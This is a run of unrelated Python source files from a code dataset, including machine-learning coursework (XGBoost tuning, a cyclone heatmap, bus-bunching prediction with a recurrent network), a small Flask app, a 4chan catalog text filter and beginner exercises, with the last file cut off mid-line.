0., 1 , 0., auto_set = False)\n strech_quasibrittle = Range( 0., 1 , 0., auto_set = False)\n\n eparams = [\"alpha\", \"delta_alpha\", \"delta_trans\", \"plotrange_min\", \"plotrange_max\",\\\n \"frac_noplot\", \"strech_residual\",\"strech_quasibrittle\" ] \n\n theta = Array\n def _theta_default(self):\n # add the first value (theta=zero) to the end of theta-array\n theta_zero = array([0])\n theta_arr = arange(self.low, self.high, (self.high-self.low) / self.numpoints) \n return hstack([theta_arr,theta_zero])\n \n radius = Property( Array, depends_on = 'theta,alpha,delta_alpha,delta_trans,frac_noplot,strech_residual,strech_quasibrittle ' )\n @cached_property\n def _get_radius(self):\n return array( vradius_fn( self.theta, self.alpha, self.delta_alpha, self.delta_trans, self.strech_residual, \\\n self.strech_quasibrittle ), dtype='float_' )\n\n def __call__(self, theta):\n # get theta array without the last value (theta=0)\n theta_nozero = self.theta[0:-1]\n # get the index of the last value in theta_nozero which is smaller than theta\n idx = len( theta_nozero[ where( theta_nozero < theta ) ] ) - 1\n # dtheta - differenz between the current theta value and the last value in \n # theta_nozero smaller than thetageo_type_grid\n if theta == 0:\n theta = 2*pi\n dtheta = theta - theta_nozero[ idx ]\n # delta_theta - differenz between the last value in theta_nonzero smaller than \n # theta and the first value in theat_nonzero greater than theta\n delta_theta = theta_nozero[1]\n result = self.radius[idx] + (( self.radius[ idx+1 ] - self.radius[ idx ] ) / delta_theta) * dtheta\n return result\n\n plot_type = Enum('polar')\n \n radiusplot = MFnPolarPlotItem(\"theta\", [\"radius\", \"plotrange_min\", \"plotrange_max\", \"frac_noplot\"],\n type_trait=\"plot_type\",\n \n # Basic axis and label properties\n show_label=False,\n resizable=True,\n orientation=\"h\",\n x_label = \"Index data\",\n y_label = \"Value data\",\n \n # Plot properties\n color = \"green\",\n bgcolor = \"lightyellow\",\n \n # Specific to scatter plot\n marker = \"circle\",\n marker_size = 2,\n outline_color = \"none\",\n \n # Border, padding properties\n border_visible=True,\n border_width=1,\n padding_bg_color = \"lightgray\")\n\n radius_min = Property( Float, depends_on = 'current_theta,alpha,delta_alpha,delta_trans, strech_residual,strech_quasibrittle' )\n @cached_property\n def _get_radius_min(self):\n r_min = self.radius.min()\n return r_min\n\n radius_max = Property( Float, depends_on = 'current_theta,alpha,delta_alpha,delta_trans, strech_residual,strech_quasibrittle' )\n @cached_property\n def _get_radius_max(self):\n r_max = self.radius.max()\n return r_max\n\n current_theta = Float( 0.0 )\n\n current_radius = Property( Float, depends_on = 'current_theta,alpha,delta_alpha,delta_trans,strech_residual,strech_quasibrittle' )\n @cached_property\n def _get_current_radius(self):\n return self.__call__( self.current_theta )\n \n traits_view = View(HSplit(\n Group(\n Tabbed( \n Item(\"alpha\"),\n Item(\"delta_alpha\"),\n Item(\"delta_trans\"),\n Item(\"strech_residual\"),\n Item(\"strech_quasibrittle\"),\n Item(\"plotrange_min\"),\n Item(\"plotrange_max\"),\n Item(\"frac_noplot\"),\n ),\n ),\n ),\n radiusplot,\n HSplit(Group(\n Tabbed( \n Item('current_theta'),\n Item('current_radius', style = 'readonly' ),\n Item('radius_min', style = 'readonly' ),\n Item('radius_max', style = 'readonly' ),\n dock = 'horizontal',\n ),\n ),\n ),\n buttons= [OKButton,CancelButton],\n menubar=MenuBar(Menu(Action(name=\"O&pen..\", action=\"open_data\"),\n Action(name=\"S&ave..\", action=\"save_file\"),\n Action(name=\"E&xit\", action=\"exit_file\"),\n name = 'File')),\n \n handler = MFnWTHandler,\n resizable=True,\n width=700, height=800)\n \nif __name__ == '__main__': \n mp = MFnPolar()\n mp.configure_traits()\n","sub_path":"scratch/KRAMS/src/apps/scratch/faezeh/latex_engine/latex_polar_engine/mfn_polar.py","file_name":"mfn_polar.py","file_ext":"py","file_size_in_byte":10821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"240880330","text":"### GT ID: cchen376\n### Assignment #1 CS7641 Fall 2019\n\n#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport seaborn as sns\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\nfrom sklearn.model_selection import GridSearchCV\nimport matplotlib.pyplot as plt\nimport xgboost as xgb\nfrom sklearn.model_selection import learning_curve\nfrom helperfuncs import * \n\n\n# # Data Preprocessing (scaling and splitting)\n\n# In[2]:\nseed=0\n\ndf_egrid = pd.read_csv('Data_for_UCI_named.csv')\ndf_egrid['stabf']=np.where(df_egrid['stabf']=='unstable',0,1)\ny_egrid=df_egrid['stabf']\nX_egrid=df_egrid.drop(['stabf','stab'],axis=1)\n\ndf_def = pd.read_csv('default_data_cleaned.csv')\ny_def=df_def['default payment next month']\nX_def=df_def.drop(['default payment next month','ID'],axis=1)\n\nX_def_s=StandardScaler().fit_transform(X_def)\nX_egrid_s=StandardScaler().fit_transform(X_egrid)\n\nX_train_egrid, X_test_egrid, y_train_egrid, y_test_egrid= train_test_split(X_egrid_s,y_egrid,test_size=.3,random_state=seed,stratify=y_egrid)\nX_train_def, X_test_def, y_train_def, y_test_def= train_test_split(X_def_s,y_def,test_size=.3,random_state=seed,stratify=y_def)\n\n\n# # Grid Search\n\n# In[34]:\n\n\nxgb_params= {'max_depth':[2,3,5,10],'learning_rate':[.05,.1,.2]}\n\n\n# In[35]:\n\n\nbest_params_egrid,df_cv_egrid,clf_cv_egrid=clfGridSearch(xgb.XGBClassifier(random_state=seed),params=xgb_params,\n X=X_train_egrid,y=y_train_egrid,cv=3,scoring='f1',\n name='electrical',clf_type='XGB',seed=seed)\n\nbest_params_def,df_cv_def,clf_cv_def=clfGridSearch(xgb.XGBClassifier(random_state=seed),params=xgb_params,\n X=X_train_def,y=y_train_def,cv=3,scoring='f1',\n name='default',clf_type='XGB',seed=seed)\n\n\n# # Grid Search Results and plots\nplt.figure()\n\ncolors=['r','b','g']\nfor idx,(label, grp) in enumerate(df_cv_egrid.groupby('param_learning_rate')):\n plt.plot(grp['param_max_depth'],grp['mean_test_score'],c=colors[idx],linestyle='-')\n plt.plot(grp['param_max_depth'],grp['mean_train_score'],c=colors[idx],linestyle='--')\nplt.xlabel('max depth')\nplt.ylabel('f1 score')\nplt.grid()\nplt.title('electrical - SVC gridsearch results (CV)')\nplt.legend(['.05 learning rate - test_f1','.05 learning rate - train_f1','.1 learning rate - test_f1','.1 learning rate - train_f1','.2 learning rate - test_f1','.2 learning rate - train_f1'])\nplt.savefig('parameter_tuning_electrical_XGB.png')\n\n\n# In[39]:\ndf_cv_def[['param_learning_rate','param_max_depth','mean_test_score']]\n\n# In[40]:\nplt.figure()\n\nfor idx,(label, grp) in enumerate(df_cv_def.groupby('param_learning_rate')):\n plt.plot(grp['param_max_depth'],grp['mean_test_score'],c=colors[idx],linestyle='-')\n plt.plot(grp['param_max_depth'],grp['mean_train_score'],c=colors[idx],linestyle='--')\nplt.xlabel('max depth')\nplt.ylabel('f1 score')\nplt.grid()\nplt.title('default - SVC gridsearch results (CV)')\nplt.legend(['.05 learning rate - test_f1','.05 learning rate - train_f1','.1 learning rate - test_f1','.1 learning rate - train_f1','.2 learning rate - test_f1','.2 learning rate - train_f1'])\nplt.savefig('parameter_tuning_default_XGB.png')\n\n\n# # Obtain testing results and metrics from best classifiers\n\n# In[3]:\nclf_egrid=xgb.XGBClassifier(learning_rate = .2, max_depth=5,random_state=seed)\nclf_def=xgb.XGBClassifier(learning_rate = .05, max_depth=3,random_state=seed)\ntrain_sizes=np.linspace(.05,.9,7)\n\n\n# ## Generate timing curve\n\n# In[14]:\nimport time\ntime_egrid_list=[]\nnum_estimators_egrid=[]\ntime_def_list=[]\nnum_estimators_def=[]\n\nfor split in train_sizes:\n X_train_egrid_temp,X_test_egrid_temp,y_train_egrid_temp,y_test_egrid_temp=train_test_split(X_egrid_s,y_egrid,train_size=split,random_state=seed)\n X_train_def_temp,X_test_def_temp,y_train_def_temp,y_test_def_temp=train_test_split(X_def_s,y_def,train_size=split,random_state=seed)\n\n start_egrid =time.time()\n clf_egrid.fit(X_train_egrid_temp,y_train_egrid_temp)\n time_egrid = time.time()-start_egrid\n\n start_def =time.time()\n clf_def.fit(X_train_def_temp,y_train_def_temp)\n time_def = time.time()-start_def\n\n time_egrid_list.append(time_egrid)\n num_estimators_egrid.append(clf_egrid.n_estimators)\n time_def_list.append(time_def)\n num_estimators_def.append(clf_def.n_estimators)\n\n\n# In[27]:\nfig, ax1 = plt.subplots()\nax1.plot(train_sizes*10000,time_egrid_list)\nax1.set_title('Timing Curve - Electrical - XGBoost')\nax2 = ax1.twinx()\nax2.plot(train_sizes*10000,np.array(time_egrid_list)/np.array(num_estimators_egrid))\nax1.set_xlabel('training size')\nax1.set_ylabel('total train time')\nax2.set_ylabel('train time per tree')\n\n\n# In[28]:\nfig, ax1 = plt.subplots()\nax1.plot(train_sizes*10000,time_def_list)\nax1.set_title('Timing Curve - Default - XGBoost')\nax2 = ax1.twinx()\nax2.plot(train_sizes*10000,np.array(time_def_list)/np.array(num_estimators_def))\nax1.set_xlabel('training size')\nax1.set_ylabel('total train time')\nax2.set_ylabel('train time per tree')\n\n\n# In[10]:\nplot_learning_curve(clf_egrid,\n 'learning curve XGB Electrical(5foldCV)',\n X_egrid_s,y_egrid,cv=5,train_sizes=train_sizes,seed=seed)\n\n\n# In[46]:\nax1=plot_learning_curve(clf_def,\n 'learning curve XGB Default(5foldCV)',\n X_def_s,y_def,cv=5,train_sizes=train_sizes,seed=seed)\n\n\n# In[6]:\ny_pred_egrid=clf_egrid.predict(X_test_egrid)\n\nprint(classification_report(y_test_egrid,y_pred_egrid))\n\nprint(confusion_matrix(y_test_egrid,y_pred_egrid))\nplot_roc_curve(y_test_egrid,y_pred_egrid,'ROC Curve for XGB Electrical')\n\n\n# In[4]:\ny_pred_def=clf_def.predict(X_test_def)\n\nprint(classification_report(y_test_def,y_pred_def))\nprint(confusion_matrix(y_test_def,y_pred_def))\nplot_roc_curve(y_test_def,y_pred_def,'ROC Curve for XGB Default')\n\n\n# In[8]:\nfrom imblearn.over_sampling import RandomOverSampler\nros = RandomOverSampler(random_state=seed)\nX_train_egrid_re, y_train_egrid_re = ros.fit_resample(X_train_egrid,y_train_egrid)\n\nclf_egrid.fit(X_train_egrid_re,y_train_egrid_re)\ny_pred_egrid=clf_egrid.predict(X_test_egrid)\n\nprint(classification_report(y_test_egrid,y_pred_egrid))\n\nprint(confusion_matrix(y_test_egrid,y_pred_egrid))\nplot_roc_curve(y_test_egrid,y_pred_egrid,'ROC Curve for XGB Electrical')\n\n\n# In[9]:\nX_def_re, y_def_re = ros.fit_resample(X_def_s,y_def)\nX_train_defr,X_test_defr,y_train_defr,y_test_defr=train_test_split(X_def_re,y_def_re,test_size=.3,random_state=0)\n\n\n# In[10]:\ny_pred_def=clf_def.predict(X_test_defr)\n\nprint(classification_report(y_test_defr,y_pred_def))\nprint(confusion_matrix(y_test_defr,y_pred_def))\nplot_roc_curve(y_test_defr,y_pred_def,'ROC Curve for XGB Over-sampling Default')\n\n\n\n\n\n\n","sub_path":"Boosting.py","file_name":"Boosting.py","file_ext":"py","file_size_in_byte":7080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"378884155","text":"\"\"\"\r\nCOMP7230 2018 Assignment 1\r\n\r\nOnce you have completed questions 1, 2, 3 and 7, running this file\r\nwill produce the heatmap.\r\n\r\nYou do not need to modify the contents of this file.\r\n\"\"\"\r\n\r\nimport scipy.ndimage as ndimage\r\nimport matplotlib\r\nfrom COMP7230_Assignment_1_Submission import *\r\n\r\n\r\ndef main():\r\n\r\n # Get the data set\r\n data_set = read_data_set(\"Cyclones.csv\")\r\n\r\n # Parse it into the required format\r\n for index, record in enumerate(data_set):\r\n data_set[index] = parse_record(record)\r\n\r\n # produce the data for the heat map\r\n heatmap = generate_heat_map(data_set)\r\n\r\n # read the map\r\n map_image = ndimage.imread(\"Australia_Map.jpg\")\r\n greymap = matplotlib.colors.rgb_to_hsv(map_image)[:, :, 2]\r\n\r\n # rescale the heatmap\r\n zoom = (np.shape(greymap)[0] / np.shape(heatmap)[0], np.shape(greymap)[1] / np.shape(heatmap)[1])\r\n heatmap = ndimage.interpolation.zoom(heatmap, zoom)\r\n heatmap -= np.amin(heatmap)\r\n heatmap /= np.amax(heatmap)\r\n\r\n print(np.amax(heatmap), np.amin(heatmap))\r\n\r\n # merge the heat map with the map of Australia and show\r\n red = np.uint8(greymap / 2 + 127 * heatmap)\r\n blue = np.uint8(greymap / 2)\r\n green = np.uint8(greymap / 2 + 127 - 127 * heatmap)\r\n\r\n rgb = np.dstack((red, green, blue))\r\n\r\n plt.clf()\r\n plt.imshow(rgb)\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"COMP7230_Assignment_1_Heatmap.py","file_name":"COMP7230_Assignment_1_Heatmap.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"239089283","text":"import re\nimport json\nimport requests\n\ndata = requests.get(\"http://boards.4chan.org/g/catalog\").text\nmatch = re.match(\".*var catalog = (?P\\{.*\\});.*\", data)\n\nif not match:\n print(\"Couldn't scrape catalog\")\n exit(1)\n\ncatalog = json.loads(match.group('catalog'))\n\nrunning = True\nwhile running:\n try:\n filtertext = input(\"filter: \")\n for number, thread in catalog['threads'].items():\n sub, teaser = thread['sub'], thread['teaser']\n if filtertext in sub.lower() or filtertext in teaser.lower():\n print(teaser)\n\n except KeyboardInterrupt:\n running = False","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"562936466","text":"import math\r\ndef main():\r\n\r\n def circle():\r\n radius = float(input('The radius of this circle is: '))\r\n perimeter = 2 * math.pi * radius\r\n print('The perimeter is %.2f' % perimeter)\r\n\r\n def number():\r\n a = 321\r\n b = 123\r\n print(a / b)\r\n print(a // b)\r\n print(a % b)\r\n print(a ** b)\r\n d = 'hell'\r\n e = \"0\" #只有使用特殊字符时才会有差别(\"与')\r\n a = int(input('a = '))\r\n b = int(input('b = '))\r\n print(type(d)) #使用type()对变量进行检查\r\n print(ord(e)) #使用ord()将字符串/一个字符转换成对应的编码\r\n print('%d + %d = %d' % (a, b, a + b))\r\n flag = not (1 != 2)\r\n print('flag = ', flag)\r\n print(flag is False) #False True 注意首字母大写\r\n\r\n def IsLeapYear():\r\n year = int(input('请输入年份: '))\r\n #如果代码太长写成一行不便于阅读 可以使用\\对代码进行折行\r\n is_leap = (year % 4 == 0 and year % 100 != 0) or \\\r\n year % 400 == 0\r\n print(is_leap)\r\n pass\r\nif __name__ == '__main__':\r\n #input() #在命令行窗口press enter关闭窗口\r\n main()","sub_path":"python_study/day1-2.py","file_name":"day1-2.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"481996739","text":"from flask import Flask, render_template, jsonify\nimport pandas as pd\n\n#Use flask_pymongo to set up mongo connection\n# app.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/stocks_app\"\n\n# mongo = PyMongo(app)\n# client = MongoClient(app.config['MONGO_URI'])\n# db = client.stocks\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n #stocks = mongo.db.stocks.insert_many()\n return render_template(\"index.html\")\n\n@app.route('/predict')\ndef data():\n actual_df = pd.read_csv(f'actual_INX.csv')\n predicted_df = pd.read_csv(f'predicted_INX.csv')\n start_date = '1/1/2018'\n\n # date_strings = (pd\n # .date_range(start=start_date, periods=len(predicted_df))\n # .strftime(\"%Y-%m-%d\")\n # .values\n # .tolist())\n\n actual_and_predicted = {\n\n # x\n # 'date': date_strings,\n # y1\n 'actual': actual_df['0'].tolist(),#to_json(orient='records'),\n # y2\n 'predicted': predicted_df['0'].tolist()#to_json(orient='records')\n } \n return jsonify(actual_and_predicted)\n\n\nif __name__ == '__main__':\n app.debug = True \n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"366079221","text":"from my_parser import Parser\r\nfrom my_tokens import *\r\nfrom my_executor import Exec\r\n\r\nmode = False\r\n\r\ne = Exec(mode=mode) # True will set to print tokens for debugging, default is Flase\r\np = Parser()\r\n\r\nwhile True:\r\n curr = input(\"Adam-Lang$ \")\r\n e.exec(p.parse(' ' + curr + ' '))\r\n '''if True: # to debug the executor tree\r\n while True:\r\n curr = input(\">>>\")\r\n exec(curr)'''\r\n if mode: [print(x) for x in p.parse(' ' + curr + ' ')] # to debug the parser","sub_path":"shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"496959776","text":"#####################################################\r\n#\tAlgoritmo de prediccion de bunching\t\t\t\t#\r\n#\tpara el conjunto completo de ventanas de tiempo\t#\r\n#\tusando RNH\t\t\t\t\t\t\t\t\t\t#\r\n#####################################################\r\n\r\nimport os\r\nimport gc\r\nimport numpy\r\nimport h5py\r\nimport math\r\nfrom pandas import read_csv\r\nfrom keras.callbacks import CSVLogger\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.optimizers import Adam\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\nfeatures = 4\r\nsecuencia = 4\r\n\r\nfechasVentana = ['20161107','20161108','20161109','20161110','20161111','20161114','20161115','20161116','20161117','20161118','20161121','20161122','20161123','20161124','20161125','20161128','20161129','20161130','20161201','20161202','20161205','20161206','20161207','20161208','20161209']\r\ninicioPruebas = 7\r\nfinPruebas = 21\r\n\r\ndef cls():\r\n\tos.system('cls' if os.name=='nt' else 'clear')\r\n\r\ndef normalizarX(dataset):\r\n#\tdataset[:, 0] = [k / (4800) for k in dataset[:, 0]]\r\n#\tdataset[:, 1] = [k / 8 for k in dataset[:, 1]]\r\n\t#dataset[:, 2] = [k / (4800) for k in dataset[:, 2]]\r\n\tdataset[:, 3] = [k / (3600) for k in dataset[:, 3]]\r\n\treturn dataset\r\n\r\ndef denormalizarX(dataset):\r\n#\tdataset[:, 0] = [k * (4800) for k in dataset[:, 0]]\r\n#\tdataset[:, 1] = [k * (8) for k in dataset[:, 1]]\r\n\t#dataset[:, 2] = [k * (4800) for k in dataset[:, 2]]\r\n\tdataset[:, 3] = [k * (3600) for k in dataset[:, 3]]\r\n\treturn dataset\r\n\r\ndef normalizarY(dataset):\r\n\tdataset = [k/(600) for k in dataset]\r\n\treturn dataset\r\n\r\ndef denormalizarY(dataset):\r\n\tdataset = [k*(600) for k in dataset]\r\n\treturn dataset\r\n\r\n# Permite hacer print con colores\r\nclass bcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n\r\n# Objeto viaje\r\nclass Viaje():\r\n\tdef __init__(self,id_viaje,limiteVentana):\r\n\t\tself.id = id_viaje;\r\n\t\tself.limiteVentana = limiteVentana;\r\n\t\tself.predicciones = numpy.array([]);\r\n\t\tself.x=numpy.array([]);\r\n\t\tself.y=numpy.array([]);\r\n\r\n# Carga el dataset de headway\r\ndataframe = read_csv('../../datos/datasetBrutos/datasetBrutoI09Modelo2.tsv', engine = 'python', sep = \"\\t\")\r\ndatasetBruto = dataframe.values\r\ndatasetBruto = datasetBruto.astype(float)\r\n\r\n# Carga el dataset de headway\r\ndataframe = read_csv('../../datos/datasetDefinitivoModelo2v4.tsv', engine = 'python', sep = \"\\t\")\r\ndatasetDefinitivo = dataframe.values\r\ndatasetDefinitivo = datasetDefinitivo.astype(float)\r\ndel(dataframe)\r\ngc.collect()\r\n\r\nprecisionesDetalle = numpy.zeros(len(range(inicioPruebas*3600, finPruebas*3600, 1800))*len(fechasVentana))\r\nprecisionesBinarias = numpy.zeros(len(range(inicioPruebas*3600, finPruebas*3600, 1800))*len(fechasVentana))\r\nsensibilidades = numpy.zeros(len(range(inicioPruebas*3600, finPruebas*3600, 1800))*len(fechasVentana))\r\nespecificidades = numpy.zeros(len(range(inicioPruebas*3600, finPruebas*3600, 1800))*len(fechasVentana))\r\n\r\nf = open(\"../../resultados/pruebas/prediccionBunchingHeadway.tsv\",\"w\")\r\nf.write(\"Fecha\\tHora fin\\tCantidad de pares de viajes\\tPrecision binaria\\tPrecision caso a caso\\n\")\r\n\r\nf2 = open(\"../../resultados/ROC/datosROCheadway2.tsv\",\"w\")\r\n\r\nfor dia in fechasVentana:\r\n\tfor finVentana in range(inicioPruebas*3600, finPruebas*3600, 1800):\r\n\r\n\t\tprint(\"Ventana:\\n- Dia: {}\\n- finVentana: {}\\n\".format(dia,finVentana))\r\n\r\n\t\t# Almacena los id de viajes que esten dentro de la ventana\r\n\t\tlista_ids = []\r\n\t\tid_viaje = 0\r\n\t\tprint('ID viaje \tINICIO \t\tFIN \tUltimoParadero')\r\n\t\tfor i in range(len(datasetBruto)):\r\n\t\t\tif datasetBruto[i][2] == 1:\r\n\t\t\t\tif id_viaje != 0:\r\n\t\t\t\t\tfinViaje = datasetBruto[i-1][3]\r\n\t\t\t\t\tif finViaje > finVentana and inicioViaje < finVentana and '{0:12.0f}'.format(id_viaje).find(dia) > -1:\r\n\t\t\t\t\t\t# Se revisa el paradero en que termina la ventana\r\n\t\t\t\t\t\tj = 2\r\n\t\t\t\t\t\twhile datasetBruto[i-j][3] > finVentana:\r\n\t\t\t\t\t\t\tj = j + 1\r\n\r\n\t\t\t\t\t\tultimoParaderoVentana = datasetBruto[i-j][2]\r\n\r\n\t\t\t\t\t\tprint('{0:11.0f}\t{1:11.0f}\t{2:11.0f}\t{3:2.0f}'.format(id_viaje, inicioViaje, finViaje,ultimoParaderoVentana))\r\n\t\t\t\t\t\tlista_ids.append(['{0:11.0f}'.format(id_viaje),ultimoParaderoVentana])\r\n\r\n\t\t\t\tid_viaje = datasetBruto[i][0]\r\n\t\t\t\tinicioViaje = datasetBruto[i][3]\r\n\r\n\t\tif len(lista_ids)>1:\r\n\r\n\t\t\t# Toma los viajes por cada id distinto (columna 0) e ingresarlo a otro arreglo \r\n\t\t\tdataset_viajes = []\r\n\t\t\tfor i in range(len(datasetDefinitivo)):\r\n\t\t\t\tid_lectura = datasetDefinitivo[i][0]\r\n\t\t\t\t#En caso que el dataset_viaje tenga datos\r\n\t\t\t\tidviaje1 = '{}{}'.format('{0:8.0f}'.format(id_lectura)[:9],'{0:16.0f}'.format(id_lectura)[11:13])\r\n\t\t\t\tidviaje2 = '{}{}'.format('{0:8.0f}'.format(id_lectura)[:9],'{0:16.0f}'.format(id_lectura)[14:16])\r\n\t\t\t\t\r\n\t\t\t\tcheck1 = False\r\n\t\t\t\tcheck2 = False\r\n\t\t\t\tidLimiteVentana1 = -1\r\n\t\t\t\tidLimiteVentana2 = -1\r\n\r\n\t\t\t\tfor j in range(len(lista_ids)):\r\n\t\t\t\t\t#print(\"\\'{}\\' \\'{}\\' \\'{}\\'\".format(lista_ids[j][:11],idviaje1[:11],idviaje2[:11]))\r\n\t\t\t\t\tif idviaje1[:11] == lista_ids[j][0][:11]:\r\n\t\t\t\t\t\tidLimiteVentana1 = lista_ids[j][1]-1\r\n\t\t\t\t\t\tcheck1 = True\r\n\t\t\t\t\tif idviaje2[:11] == lista_ids[j][0][:11]:\r\n\t\t\t\t\t\tidLimiteVentana2 = lista_ids[j][1]-1\r\n\t\t\t\t\t\tcheck2 = True\r\n\t\t\t\t\r\n\t\t\t\t# Si ambos viajes estan en la ventana\r\n\t\t\t\tif check1 and check2:\r\n\r\n\t\t\t\t\tindiceVentana = min([idLimiteVentana2,idLimiteVentana1])\r\n\t\t\t\t\t#print('{} {}'.format(idviaje1,idviaje2))\r\n\t\t\t\t\tif len(dataset_viajes) > 0:\r\n\t\t\t\t\t\t#Agrega puntos al mismo viaje\r\n\t\t\t\t\t\tif dataset_viajes[len(dataset_viajes)-1].id == id_lectura:\r\n\t\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].x = numpy.append(dataset_viajes[len(dataset_viajes)-1].x,[datasetDefinitivo[i][1:5]],axis=0)\r\n\t\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].y = numpy.append(dataset_viajes[len(dataset_viajes)-1].y,[datasetDefinitivo[i][5]],axis=0)\r\n\t\t\t\t\t\t#Agrega un nuevo viaje\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tdataset_viajes.append(Viaje(id_lectura,indiceVentana))\r\n\t\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].x = numpy.array([datasetDefinitivo[i][1:5]])\r\n\t\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].y = numpy.array([datasetDefinitivo[i][5]])\r\n\t\t\t\t\t#En caso que sea el primer viaje\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tdataset_viajes.append(Viaje(id_lectura,indiceVentana))\r\n\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].x = numpy.array([datasetDefinitivo[i][1:5]])\r\n\t\t\t\t\t\tdataset_viajes[len(dataset_viajes)-1].y = numpy.array([datasetDefinitivo[i][5]])\r\n\r\n\t\t\tdataset = dataset_viajes\r\n\t\t\tdel(dataset_viajes)\r\n\t\t\tgc.collect()\r\n\r\n\t\t\tfor i in range(len(dataset)):\r\n\t\t\t\tdataset[i].x = normalizarX(dataset[i].x)\r\n\t\t\t\tdataset[i].x = numpy.reshape(dataset[i].x, (1,len(dataset[i].x), len(dataset[i].x[0])))\r\n\t\t\t#\tdataset[i].y = normalizarY(dataset[i].y)\r\n\t\t\t\tdataset[i].y = numpy.reshape(dataset[i].y, (len(dataset[i].y),1))\r\n\r\n\t\t\t#print('\\nCantidad de pares de viajes: {}'.format(len(dataset)))\r\n\r\n\t\t\t# Importa el modelo de la red predictora\r\n\t\t\tmodelo = load_model('../../resultados/modelos/Headway/modeloHeadway10/modeloHeadway002e51.h5')\r\n\r\n\t\t\t# Debe preparar secuencias hasta que la prediccion ya no este dentro de la ventana\r\n\t\t\t# Las nuevas secuencias se preparan en base a las predicciones anteriores\r\n\r\n\t\t\tprecisionBinaria = 0.0\r\n\t\t\tprecisionDetalle = float(0.0)\r\n\t\t\tsensibilidad = 0.0\r\n\t\t\tespecificidad = 0.0\r\n\r\n\t\t\tcantidadParesViajes = 0.0\r\n\r\n\t\t\t#print('ID par\\tparadero\\tsalida prediccion\\tsalida real\\theadway prediccion\\theadway real\\tbunching prediccion\\tbunching real')\r\n\t\t\tfor i in range(len(dataset)):\r\n\t\t\t\t# SE captura el headway inicial para determinar el bunching\r\n\t\t\t\theadwayInicial = dataset[i].x[0][0][3]*3600\t\t\t\t\r\n\t\t\t\t#print(headwayInicial)\r\n\r\n\t\t\t\ttempPrecisionPrediccion = 0\r\n\t\t\t\ttempPrecisionReal = 0\r\n\t\t\t\ttempPrecisionDetalle = 0 \r\n\t\t\t\ttempSensibilidad = 0.0\r\n\t\t\t\ttempEspecificidad = 0.0\r\n\t\t\t\tcantBunching = 0.0\r\n\t\t\t\tcantNoBunching = 0.0\r\n\r\n\t\t\t\tif dataset[i].limiteVentana < len(dataset[i].x[0])-1 and dataset[i].limiteVentana > secuencia:\r\n\t\t\t\t\tcantidadParesViajes = cantidadParesViajes + 1.0\r\n\t\t\t\t\tultimaSecuencia = numpy.array([])\r\n\t\t\t\t\tfor j in range(len(dataset[i].x[0])-secuencia):\r\n\t\t\t\t\t\t# En caso que se encuentre dentro de la ventana\r\n\t\t\t\t\t\tif (j+secuencia) <= dataset[i].limiteVentana:\r\n\t\t\t\t\t\t\t# Se alimenta a la red para realizar predicciones\r\n\t\t\t\t\t\t\tentrada_metadatos = numpy.array( [ dataset[i].x[0][j+secuencia][0:3] ] )\r\n\t\t\t\t\t\t\tentrada_recurrente = numpy.array( dataset[i].x[:,j:j+secuencia,3:4] )\r\n\t\t\t\t\t\t\tsalida_secuencia = numpy.array( [ dataset[i].y[j+secuencia] ] )\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tprediccionesTemp = modelo.predict([entrada_metadatos,entrada_recurrente], batch_size = 1, verbose = 0)\r\n\r\n\t\t\t\t\t\t\tprediccion = prediccionesTemp[0][0]*600\r\n\t\t\t\t\t\t\theadwayPrediccion = prediccionesTemp[0][0]*600+dataset[i].x[0][j+secuencia][3]*3600\r\n\t\t\t\t\t\t\theadwayReal = salida_secuencia[0][0]+dataset[i].x[0][j+secuencia][3]*3600\r\n\r\n\t\t\t\t\t\t\t#Revisa si hay bunching o no\r\n\t\t\t\t\t\t\tbunchingPrediccion = False\r\n\t\t\t\t\t\t\tbunchingReal = False\r\n\t\t\t\t\t\t\tif abs(headwayPrediccion) < 0.25*headwayInicial:\r\n\t\t\t\t\t\t\t\tbunchingPrediccion = True\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif abs(headwayReal) < 0.25*headwayInicial:\r\n\t\t\t\t\t\t\t\tbunchingReal = 